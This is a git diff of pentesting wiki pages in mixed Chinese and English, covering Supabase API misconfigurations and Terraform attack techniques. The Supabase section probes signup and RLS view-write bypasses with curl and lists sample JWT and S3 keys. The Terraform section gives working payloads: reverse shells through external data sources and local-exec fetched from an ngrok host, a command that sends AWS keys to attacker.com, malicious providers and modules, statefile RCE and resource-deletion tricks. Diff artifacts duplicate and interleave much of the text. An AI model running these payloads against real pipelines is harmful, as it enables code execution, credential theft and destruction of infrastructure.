It'll also generate an **anon API key** (`role: "anon"`), like: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` that the application will need to use in order to contact the API key exposed in our example in
可以在 [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server) 中找到访问该 API 的 REST 文档,但最有趣的端点是:
It's possible to find the API REST to contact this API in the [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), but the most interesting endpoints would be:
<details>
<summary>注册 (/auth/v1/signup)</summary>
<summary>Signup (/auth/v1/signup)</summary>
```
POST /auth/v1/signup HTTP/2
Host: id.io.net
@@ -68,11 +69,13 @@ Priority: u=1, i
{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
```
</details>
<details>
<summary>登录 (/auth/v1/token?grant_type=password)</summary>
<summary>Login (/auth/v1/token?grant_type=password)</summary>
```
POST /auth/v1/token?grant_type=password HTTP/2
Host: hypzbtgspjkludjcnjxl.supabase.co
@@ -97,177 +100,175 @@ Priority: u=1, i
{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
```
</details>
因此,每当你发现客户在使用 supabase 且使用了他们被授予的子域(公司某个子域可能对他们的 supabase 子域设置了 CNAME你可以尝试 **使用 supabase API 在平台上创建一个新账户**
So, whenever you discover a client using supabase with the subdomain they were granted (it's possible that a subdomain of the company has a CNAME over their supabase subdomain), you might try to **create a new account in the platform using the supabase API**.
### secret / service_role API 密钥
### secret / service_role api keys
还会生成一个带有 **`role: "service_role"`** 的 secret API key。这个 API 密钥应该保密,因为它能绕过 **Row Level Security**
A secret API key will also be generated with **`role: "service_role"`**. This API key should be secret because it will be able to bypass **Row Level Security**.
API 密钥看起来像这样: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`
The API key looks like this: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`
### JWT Secret
还会生成一个 **JWT Secret**,以便应用可以 **创建并签署自定义 JWT tokens**
A **JWT Secret** will also be generate so the application can **create and sign custom JWT tokens**.
## 身份验证
## Authentication
### 注册
### Signups
> [!TIP]
> 默认情况下supabase 将允许 **新用户通过前面提到的 API 端点在你的项目上创建账号**。
> By **default** supabase will allow **new users to create accounts** on your project by using the previously mentioned API endpoints.
但是,这些新账户默认情况下**需要验证他们的电子邮件地址**才能登录。可以启用 **"Allow anonymous sign-ins"** 以允许用户在不验证邮箱的情况下登录。这可能会授予对**意外数据**的访问(他们会获得 `public` `authenticated` 角色)。\
这是非常糟糕的做法,因为 supabase 按活跃用户收费所以人们可以创建用户并登录supabase 会对这些用户收费:
However, these new accounts, by default, **will need to validate their email address** to be able to login into the account. It's possible to enable **"Allow anonymous sign-ins"** to allow people to login without verifying their email address. This could grant access to **unexpected data** (they get the roles `public` and `authenticated`).\
This is a very bad idea because supabase charges per active user so people could create users and login and supabase will charge for those:
<figure><img src="../images/image (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
#### Auth: 服务器端注册强制执行
#### Auth: Server-side signup enforcement
仅在前端隐藏注册按钮并不足够。如果 **Auth server 仍然允许注册**,攻击者可以使用公共的 `anon` key 直接调用 API 并创建任意用户。
Hiding the signup button in the frontend is not enough. If the **Auth server still allows signups**, an attacker can call the API directly with the public `anon` key and create arbitrary users.
Quick test (from an unauthenticated client):
快速测试(来自未认证的客户端):
```bash
curl -X POST \
-H "apikey: <SUPABASE_ANON_KEY>" \
-H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
-H "Content-Type: application/json" \
-d '{"email":"attacker@example.com","password":"Sup3rStr0ng!"}' \
https://<PROJECT_REF>.supabase.co/auth/v1/signup
-H "apikey: <SUPABASE_ANON_KEY>" \
-H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
-H "Content-Type: application/json" \
-d '{"email":"attacker@example.com","password":"Sup3rStr0ng!"}' \
https://<PROJECT_REF>.supabase.co/auth/v1/signup
```
预期的加固措施:
- 在 Dashboard 中禁用电子邮件/密码注册Authentication → Providers → Email → Disable sign ups (invite-only),或设置等效的 GoTrue setting
- 验证 API 现在对之前的调用返回 4xx并且没有创建新用户。
- 如果依赖邀请或 SSO确保所有其他 providers 被禁用,除非明确需要。
Expected hardening:
- Disable email/password signups in the Dashboard: Authentication → Providers → Email → Disable sign ups (invite-only), or set the equivalent GoTrue setting.
- Verify the API now returns 4xx to the previous call and no new user is created.
- If you rely on invites or SSO, ensure all other providers are disabled unless explicitly needed.
## RLS and Views: Write bypass via PostgREST
使用 Postgres VIEW 来“隐藏”敏感列并通过 PostgREST 暴露,可能会改变权限的评估方式。在 PostgreSQL
- 普通视图默认以视图所有者的权限执行(definer semantics)。在 PG ≥15 中可以选择使用 `security_invoker`
- Row Level Security (RLS) 作用于基表。表所有者会绕过 RLS除非在表上设置了 `FORCE ROW LEVEL SECURITY`
- 可更新视图可以接受 INSERT/UPDATE/DELETE这些操作随后应用到基表。没有 `WITH CHECK OPTION` 的情况下,不符合视图谓词的写入可能仍然成功。
Using a Postgres VIEW to “hide” sensitive columns and exposing it via PostgREST can change how privileges are evaluated. In PostgreSQL:
- Ordinary views execute with the privileges of the view owner by default (definer semantics). In PG ≥15 you can opt into `security_invoker`.
- Row Level Security (RLS) applies on base tables. Table owners bypass RLS unless `FORCE ROW LEVEL SECURITY` is set on the table.
- Updatable views can accept INSERT/UPDATE/DELETE that are then applied to the base table. Without `WITH CHECK OPTION`, writes that dont match the view predicate may still succeed.
在实战中观察到的风险模式:
- 一个列被减少的视图通过 Supabase REST 暴露并授予给 `anon`/`authenticated`
- PostgREST 允许对可更新视图进行 DML且该操作以视图所有者的权限进行评估从而有效地绕过基表上原本的 RLS 策略。
- 结果:低权限客户端可以批量编辑他们不应修改的行(例如 profile bios/avatars
Risk pattern observed in the wild:
- A reduced-column view is exposed through Supabase REST and granted to `anon`/`authenticated`.
- PostgREST allows DML on the updatable view and the operation is evaluated with the view owners privileges, effectively bypassing the intended RLS policies on the base table.
- Result: low-privileged clients can mass-edit rows (e.g., profile bios/avatars) they should not be able to modify.
Illustrative write via view (attempted from a public client):
示例:通过视图进行的写操作(从公共客户端尝试):
```bash
curl -X PATCH \
-H "apikey: <SUPABASE_ANON_KEY>" \
-H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
-H "Content-Type: application/json" \
-H "Prefer: return=representation" \
-d '{"bio":"pwned","avatar_url":"https://i.example/pwn.png"}' \
"https://<PROJECT_REF>.supabase.co/rest/v1/users_view?id=eq.<victim_user_id>"
-H "apikey: <SUPABASE_ANON_KEY>" \
-H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
-H "Content-Type: application/json" \
-H "Prefer: return=representation" \
-d '{"bio":"pwned","avatar_url":"https://i.example/pwn.png"}' \
"https://<PROJECT_REF>.supabase.co/rest/v1/users_view?id=eq.<victim_user_id>"
```
Hardening checklist for views and RLS:
- 优先公开基础表,并使用明确的最小权限授权和精确的 RLS 策略。
- Prefer exposing base tables with explicit, least-privilege grants and precise RLS policies.
- If you must expose a view:
- 如果必须公开 view
- Make it non-updatable (e.g., include expressions/joins) or deny `INSERT/UPDATE/DELETE` on the view to all untrusted roles.
- 使其不可更新(例如,包含表达式/连接),或对所有不受信任的角色拒绝 `INSERT/UPDATE/DELETE` 对该 view 的操作。
- Enforce `ALTER VIEW <v> SET (security_invoker = on)` so the invokers privileges are used instead of the owners.
- 强制使用 `ALTER VIEW <v> SET (security_invoker = on)`,以便使用调用者的权限而不是所有者的权限。
- On base tables, use `ALTER TABLE <t> FORCE ROW LEVEL SECURITY;` so even owners are subject to RLS.
- 在基础表上使用 `ALTER TABLE <t> FORCE ROW LEVEL SECURITY;`,这样即使是所有者也会受到 RLS 约束。
- If allowing writes via an updatable view, add `WITH [LOCAL|CASCADED] CHECK OPTION` and complementary RLS on base tables to ensure only allowed rows can be written/changed.
- 如果通过可更新的 view 允许写入,添加 `WITH [LOCAL|CASCADED] CHECK OPTION` 并在基础表上配套设置 RLS以确保只能写入/修改被允许的行。
- Make it non-updatable (e.g., include expressions/joins) or deny `INSERT/UPDATE/DELETE` on the view to all untrusted roles.
- Enforce `ALTER VIEW <v> SET (security_invoker = on)` so the invokers privileges are used instead of the owners.
- On base tables, use `ALTER TABLE <t> FORCE ROW LEVEL SECURITY;` so even owners are subject to RLS.
- If allowing writes via an updatable view, add `WITH [LOCAL|CASCADED] CHECK OPTION` and complementary RLS on base tables to ensure only allowed rows can be written/changed.
- In Supabase, avoid granting `anon`/`authenticated` any write privileges on views unless you have verified end-to-end behavior with tests.
- 在 Supabase 中,除非通过测试验证了端到端行为,否则不要授予 `anon`/`authenticated` 对 view 的任何写权限。
Detection tip:
- 检测提示:
- From `anon` and an `authenticated` test user, attempt all CRUD operations against every exposed table/view. Any successful write where you expected denial indicates a misconfiguration.
- 使用 `anon``authenticated` 测试用户,对每个公开的表/视图尝试所有 CRUD 操作。任何本应被拒绝但实际成功的写操作都表明存在配置错误。
### OpenAPI-driven CRUD probing from anon/auth roles
PostgREST exposes an OpenAPI document that you can use to enumerate all REST resources, then automatically probe allowed operations from low-privileged roles.
PostgREST 会暴露一个 OpenAPI 文档,可用于枚举所有 REST 资源,然后自动探测低权限角色允许的操作。
Fetch the OpenAPI (works with the public anon key):
```bash
curl -s https://<PROJECT_REF>.supabase.co/rest/v1/ \
-H "apikey: <SUPABASE_ANON_KEY>" \
-H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
-H "Accept: application/openapi+json" | jq '.paths | keys[]'
-H "apikey: <SUPABASE_ANON_KEY>" \
-H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
-H "Accept: application/openapi+json" | jq '.paths | keys[]'
```
探测模式(示例):
- 读取单行(根据 RLS 预期返回 401/403/200
Probe pattern (examples):
- Read a single row (expect 401/403/200 depending on RLS):
```bash
curl -s "https://<PROJECT_REF>.supabase.co/rest/v1/<table>?select=*&limit=1" \
-H "apikey: <SUPABASE_ANON_KEY>" \
-H "Authorization: Bearer <SUPABASE_ANON_KEY>"
-H "apikey: <SUPABASE_ANON_KEY>" \
-H "Authorization: Bearer <SUPABASE_ANON_KEY>"
```
- 测试 UPDATE 被阻止(使用不存在的 filter 来避免在测试期间更改数据):
- Test UPDATE is blocked (use a non-existing filter to avoid altering data during testing):
```bash
curl -i -X PATCH \
-H "apikey: <SUPABASE_ANON_KEY>" \
-H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
-H "Content-Type: application/json" \
-H "Prefer: return=minimal" \
-d '{"__probe":true}' \
"https://<PROJECT_REF>.supabase.co/rest/v1/<table_or_view>?id=eq.00000000-0000-0000-0000-000000000000"
-H "apikey: <SUPABASE_ANON_KEY>" \
-H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
-H "Content-Type: application/json" \
-H "Prefer: return=minimal" \
-d '{"__probe":true}' \
"https://<PROJECT_REF>.supabase.co/rest/v1/<table_or_view>?id=eq.00000000-0000-0000-0000-000000000000"
```
- 测试 INSERT 被阻止:
- Test INSERT is blocked:
```bash
curl -i -X POST \
-H "apikey: <SUPABASE_ANON_KEY>" \
-H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
-H "Content-Type: application/json" \
-H "Prefer: return=minimal" \
-d '{"__probe":true}' \
"https://<PROJECT_REF>.supabase.co/rest/v1/<table_or_view>"
-H "apikey: <SUPABASE_ANON_KEY>" \
-H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
-H "Content-Type: application/json" \
-H "Prefer: return=minimal" \
-d '{"__probe":true}' \
"https://<PROJECT_REF>.supabase.co/rest/v1/<table_or_view>"
```
- 测试 DELETE 被阻止:
- Test DELETE is blocked:
```bash
curl -i -X DELETE \
-H "apikey: <SUPABASE_ANON_KEY>" \
-H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
"https://<PROJECT_REF>.supabase.co/rest/v1/<table_or_view>?id=eq.00000000-0000-0000-0000-000000000000"
-H "apikey: <SUPABASE_ANON_KEY>" \
-H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
"https://<PROJECT_REF>.supabase.co/rest/v1/<table_or_view>?id=eq.00000000-0000-0000-0000-000000000000"
```
Recommendations:
- 将之前的探测针对 `anon` 和最低权限的 `authenticated` 用户自动化,并将其集成到 CI 中以捕捉回归。
- 将每个暴露的 表/视图/函数 视为一级攻击面。不要假设视图会“继承”其基表相同的 RLS 姿态。
- Automate the previous probes for both `anon` and a minimally `authenticated` user and integrate them in CI to catch regressions.
- Treat every exposed table/view/function as a first-class surface. Dont assume a view “inherits” the same RLS posture as its base tables.
### 密码与会话
### Passwords & sessions
可以指定最小密码长度(默认)、密码要求(默认没有)并禁止使用 leaked passwords\
建议 **改进默认的密码要求,因为默认设置较弱**
It's possible to indicate the minimum password length (by default), requirements (no by default) and disallow to use leaked passwords.\
It's recommended to **improve the requirements as the default ones are weak**.
- User Sessions: 可以配置用户会话的工作方式(超时、每个用户 1 个会话...
- Bot and Abuse Protection: 可以启用 Captcha
- User Sessions: It's possible to configure how user sessions work (timeouts, 1 session per user...)
- Bot and Abuse Protection: It's possible to enable Captcha.
### SMTP Settings
可以设置 SMTP 来发送邮件。
It's possible to set an SMTP to send emails.
### 高级设置
### Advanced Settings
- 设置访问令牌的过期时间(默认 3600
- 设置以检测并撤销可能被妥协的 refresh tokens 并设置超时
- MFA:指定每个用户一次可注册多少 MFA 因子(默认 10
- Max Direct Database Connections:用于 auth 的最大直接数据库连接数(默认 10
- Max Request DurationAuth 请求允许的最长时间(默认 10s
- Set expire time to access tokens (3600 by default)
- Set to detect and revoke potentially compromised refresh tokens and timeout
- MFA: Indicate how many MFA factors can be enrolled at once per user (10 by default)
- Max Direct Database Connections: Max number of connections used to auth (10 by default)
- Max Request Duration: Maximum time allowed for an Auth request to last (10s by default)
## 存储
## Storage
> [!TIP]
> Supabase allows **to store files** and make them accesible over a URL (it uses S3 buckets).
- 设置上传文件大小限制(默认 50MB
- Set the upload file size limit (default is 50MB)
- The S3 connection is given with a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
- 可以 **request S3 access key**,由 `access key ID`(例如 `a37d96544d82ba90057e0e06131d0a7b`)和 `secret access key`(例如 `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)组成
- It's possible to **request S3 access key** that are formed by an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)
## Edge Functions
可以在 supabase 中 **store secrets**,这些 secrets 将被 **accessible by edge functions**(可以通过 web 创建和删除,但无法直接获取其值)。
It's possible to **store secrets** in supabase also which will be **accessible by edge functions** (the can be created and deleted from the web, but it's not possible to access their value directly).
## 参考资料
## References
- [Building Hacker Communities: Bug Bounty Village, getDiscloseds Supabase Misconfig, and the LHE Squad (Ep. 133) YouTube](https://youtu.be/NI-eXMlXma4)
- [Critical Thinking Podcast Episode 133 page](https://www.criticalthinkingpodcast.io/episode-133-building-hacker-communities-bug-bounty-village-getdisclosed-and-the-lhe-squad/)

View File

@@ -2,31 +2,31 @@
{{#include ../banners/hacktricks-training.md}}
## 基本信息
## Basic Information
[From the docs:](https://developer.hashicorp.com/terraform/intro)
HashiCorp Terraform 是一个 **infrastructure as code tool**,它允许你在可读的配置文件中定义 **cloud and on-prem resources**这些文件可以被版本化、重用和共享。然后你可以使用一致的工作流在整个生命周期中配置和管理所有基础设施。Terraform 可以管理低层组件(如 computestorage networking resources),也可以管理高层组件(如 DNS entries SaaS features)。
HashiCorp Terraform is an **infrastructure as code tool** that lets you define both **cloud and on-prem resources** in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features.
#### How does Terraform work?
Terraform 通过各个平台和服务的应用程序编程接口APIs创建和管理资源。Providers 使 Terraform 能够与任何具有可访问 API 的平台或服务协同工作。
Terraform creates and manages resources on cloud platforms and other services through their application programming interfaces (APIs). Providers enable Terraform to work with virtually any platform or service with an accessible API.
![](<../images/image (177).png>)
HashiCorp Terraform 社区已经编写了 **超过 1700 providers** 来管理数千种不同类型的资源和服务,并且这个数字还在增长。你可以在 [Terraform Registry](https://registry.terraform.io/) 上找到所有公开可用的 providers包括 Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog 等等。
HashiCorp and the Terraform community have already written **more than 1700 providers** to manage thousands of different types of resources and services, and this number continues to grow. You can find all publicly available providers on the [Terraform Registry](https://registry.terraform.io/), including Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, and many more.
核心的 Terraform 工作流由三个阶段组成:
The core Terraform workflow consists of three stages:
- **Write:** 你定义资源,这些资源可能分布在多个 cloud providers 和服务上。例如,你可能创建一个配置,在 Virtual Private Cloud (VPC) 网络中的虚拟机上部署一个应用,并配置 security groups 和一个 load balancer
- **Plan:** Terraform 创建一个执行计划,描述它将基于现有基础设施和你的配置创建、更新或销毁的基础设施。
- **Apply:** 在获得批准后Terraform 以正确的顺序执行提议的操作,遵循任何资源依赖关系。例如,如果你更新了 VPC 的属性并改变了该 VPC 中虚拟机的数量Terraform 会先重建 VPC 然后再扩展虚拟机。
- **Write:** You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer.
- **Plan:** Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration.
- **Apply:** On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines.
![](<../images/image (215).png>)
### Terraform Lab
只需在你的电脑上安装 terraform。
Just install terraform in your computer.
Here you have a [guide](https://learn.hashicorp.com/tutorials/terraform/install-cli) and here you have the [best way to download terraform](https://www.terraform.io/downloads).
@@ -34,95 +34,105 @@ Here you have a [guide](https://learn.hashicorp.com/tutorials/terraform/install-
Terraform **doesn't have a platform exposing a web page or a network service** we can enumerate, therefore, the only way to compromise terraform is to **be able to add/modify terraform configuration files** or to **be able to modify the terraform state file** (see chapter below).
然而,terraform 是一个被入侵后 **非常敏感的组件**,因为它需要对不同的位置拥有 **privileged access** 才能正常工作。
However, terraform is a **very sensitive component** to compromise because it will have **privileged access** to different locations so it can work properly.
攻击者能够妥协运行 terraform 的系统的主要方式是 **妥协存储 terraform 配置的 repository**,因为这些配置最终会被 **解释/执行**
The main way for an attacker to be able to compromise the system where terraform is running is to **compromise the repository that stores terraform configurations**, because at some point they are going to be **interpreted**.
实际上,已经有一些解决方案会在创建 PR 后自动执行 terraform plan/apply例如 **Atlantis**
Actually, there are solutions out there that **execute terraform plan/apply automatically after a PR** is created, such as **Atlantis**:
{{#ref}}
atlantis-security.md
{{#endref}}
如果你能够妥协 terraform 文件,当有人执行 `terraform plan` `terraform apply` 时,有多种方式可以实现 RCE。
If you are able to compromise a terraform file there are different ways you can perform RCE when someone executed `terraform plan` or `terraform apply`.
### Terraform plan
Terraform plan 是 terraform 中 **使用最频繁的命令**,开发者/使用 terraform 的解决方案会频繁调用它,所以 **获取 RCE 的最简单方式** 是确保你能污染一个会在 `terraform plan` 中执行任意命令的 terraform 配置文件。
Terraform plan is the **most used command** in terraform and developers/solutions using terraform call it all the time, so the **easiest way to get RCE** is to make sure you poison a terraform config file that will execute arbitrary commands in a `terraform plan`.
**Using an external provider**
Terraform 提供了 [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs),它提供了一种在 Terraform 与外部程序之间建立接口的方法。你可以使用 `external` data source 在 `plan` 期间运行任意代码。
Terraform offers the [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) which provides a way to interface between Terraform and external programs. You can use the `external` data source to run arbitrary code during a `plan`.
Injecting in a terraform config file something like the following will execute a rev shell when executing `terraform plan`:
在 terraform 配置文件中注入如下类似内容,将在执行 `terraform plan` 时触发 rev shell
```javascript
data "external" "example" {
program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}
```
**使用自定义 provider**
攻击者可以将 [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) 提交到 [Terraform Registry](https://registry.terraform.io/),然后将其添加到 feature 分支中的 Terraform 代码([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)
**Using a custom provider**
An attacker could send a [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) to the [Terraform Registry](https://registry.terraform.io/) and then add it to the Terraform code in a feature branch ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)):
```javascript
terraform {
required_providers {
evil = {
source = "evil/evil"
version = "1.0"
}
}
}
terraform {
required_providers {
evil = {
source = "evil/evil"
version = "1.0"
}
}
}
provider "evil" {}
```
这个 provider 会在 `init` 阶段被下载,并会在执行 `plan` 时运行恶意代码
你可以在 [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec) 找到一个示例
The provider is downloaded in the `init` and will run the malicious code when `plan` is executed
**使用外部引用**
You can find an example in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec)
前面提到的两种方法都有用,但都不是非常隐蔽(第二种比第一种更隐蔽,但也更复杂)。你甚至可以通过以下建议以更**隐蔽的方式**执行此攻击:
**Using an external reference**
Both mentioned options are useful but not very stealthy (the second is more stealthy but more complex than the first one). You can perform this attack even in a **stealthier way**, by following this suggestions:
- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
- 与其直接将 rev shell 添加到 terraform 文件中,你可以**加载一个外部资源**,该资源包含 rev shell
```javascript
module "not_rev_shell" {
source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
}
```
你可以在 [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) 找到 rev shell 代码
- 在外部资源中,使用 **ref** 功能将 **terraform rev shell code in a branch** 隐藏在仓库的某个分支中,例如:`git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
### Terraform Apply
Terraform apply 将被执行以应用所有更改,你也可以滥用它来通过注入 **一个包含** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html) **的恶意 Terraform 文件** 来获得 RCE。\
你只需确保像下面这样的载荷被写入到 `main.tf` 文件末尾:
Terraform apply will be executed to apply all the changes, you can also abuse it to obtain RCE injecting **a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
You just need to make sure some payload like the following ones ends in the `main.tf` file:
```json
// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
provisioner "local-exec" {
command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
}
provisioner "local-exec" {
command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
}
}
// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
provisioner "local-exec" {
command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
}
provisioner "local-exec" {
command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
}
}
```
请遵循**先前技术的建议**,以**使用外部引用更隐蔽的方式**执行此攻击。
Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way using external references**.
## Secrets Dumps
你可以通过向 terraform 文件添加类似的内容并运行 `terraform apply`,使 **terraform 使用的 secret 值被转储**
You can have **secret values used by terraform dumped** running `terraform apply` by adding to the terraform file something like:
```json
output "dotoken" {
value = nonsensitive(var.do_token)
value = nonsensitive(var.do_token)
}
```
## 滥用 Terraform state 文件
## Abusing Terraform State Files
In case you have write access over terraform state files but cannot change the terraform code, [**this research**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) gives some interesting options to take advantage of the file. Even if you would have write access over the config files, using the vector of state files is often way more sneaky, since you do not leave tracks in the `git` history.
@@ -132,273 +142,297 @@ It is possible to [create a custom provider](https://developer.hashicorp.com/ter
The provider [statefile-rce](https://registry.terraform.io/providers/offensive-actions/statefile-rce/latest) builds on the research and weaponizes this principle. You can add a fake resource and state the arbitrary bash command you want to run in the attribute `command`. When the `terraform` run is triggered, this will be read and executed in both the `terraform plan` and `terraform apply` steps. In case of the `terraform apply` step, `terraform` will delete the fake resource from the state file after executing your command, cleaning up after itself. More information and a full demo can be found in the [GitHub repository hosting the source code for this provider](https://github.com/offensive-actions/terraform-provider-statefile-rce).
要直接使用,只需在 `resources` 数组的任意位置包含如下内容,并自定义 `name` `command` 属性:
To use it directly, just include the following at any position of the `resources` array and customize the `name` and the `command` attributes:
```json
{
"mode": "managed",
"type": "rce",
"name": "<arbitrary_name>",
"provider": "provider[\"registry.terraform.io/offensive-actions/statefile-rce\"]",
"instances": [
{
"schema_version": 0,
"attributes": {
"command": "<arbitrary_command>",
"id": "rce"
},
"sensitive_attributes": [],
"private": "bnVsbA=="
}
]
"mode": "managed",
"type": "rce",
"name": "<arbitrary_name>",
"provider": "provider[\"registry.terraform.io/offensive-actions/statefile-rce\"]",
"instances": [
{
"schema_version": 0,
"attributes": {
"command": "<arbitrary_command>",
"id": "rce"
},
"sensitive_attributes": [],
"private": "bnVsbA=="
}
]
}
```
Then, as soon as `terraform` gets executed, your code will run.
### 删除资源 <a href="#deleting-resources" id="deleting-resources"></a>
### Deleting resources <a href="#deleting-resources" id="deleting-resources"></a>
有两种方法可以销毁资源:
There are 2 ways to destroy resources:
1. **在 state 文件中插入一个随机名称的资源,指向要销毁的真实资源**
1. **Insert a resource with a random name into the state file pointing to the real resource to destroy**
Because terraform will see that the resource shouldn't exit, it'll destroy it (following the real resource ID indicated). Example from the previous page:
因为 `terraform` 会看到该资源不应该存在,它就会销毁它(按照所示的真实资源 ID。示例来自上一页
```json
{
"mode": "managed",
"type": "aws_instance",
"name": "example",
"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
"instances": [
{
"attributes": {
"id": "i-1234567890abcdefg"
}
}
]
"mode": "managed",
"type": "aws_instance",
"name": "example",
"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
"instances": [
{
"attributes": {
"id": "i-1234567890abcdefg"
}
}
]
},
```
2. **修改资源以使其无法更新(因此会被删除并重新创建)**
对于 EC2 实例,修改实例的类型足以使 terraform 删除并重新创建它。
2. **Modify the resource to delete in a way that it's not possible to update (so it'll be deleted a recreated)**
### 替换被列入黑名单的 provider
For an EC2 instance, modifying the type of the instance is enough to make terraform delete a recreate it.
### Replace blacklisted provider
In case you encounter a situation where `hashicorp/external` was blacklisted, you can re-implement the `external` provider by doing the following. Note: We use a fork of external provider published by https://registry.terraform.io/providers/nazarewk/external/latest. You can publish your own fork or re-implementation as well.
如果遇到 `hashicorp/external` 被列入黑名单的情况,可以通过以下方式重新实现 `external` provider。注意我们使用了由 https://registry.terraform.io/providers/nazarewk/external/latest 发布的 external provider 的 fork。你也可以发布你自己的 fork 或重新实现。
```terraform
terraform {
required_providers {
external = {
source = "nazarewk/external"
version = "3.0.0"
}
}
required_providers {
external = {
source = "nazarewk/external"
version = "3.0.0"
}
}
}
```
然后你可以像平常一样使用 `external`
Then you can use `external` as per normal.
```terraform
data "external" "example" {
program = ["sh", "-c", "whoami"]
program = ["sh", "-c", "whoami"]
}
```
## Terraform Cloud speculative plan RCE and credential exfiltration
本场景滥用 Terraform Cloud (TFC) runners speculative plans 期间 pivot 到目标云账户。
This scenario abuses Terraform Cloud (TFC) runners during speculative plans to pivot into the target cloud account.
- Preconditions:
- 从开发者机器窃取 Terraform Cloud token。CLI 将 token 以明文存储在 `~/.terraform.d/credentials.tfrc.json`
- token 必须对目标 organization/workspace 有访问权限,并至少具有 `plan` 权限。VCS-backed workspaces 会阻止 CLI 执行 `apply`,但仍允许 speculative plans
- Steal a Terraform Cloud token from a developer machine. The CLI stores tokens in plaintext at `~/.terraform.d/credentials.tfrc.json`.
- The token must have access to the target organization/workspace and at least the `plan` permission. VCS-backed workspaces block `apply` from CLI, but still allow speculative plans.
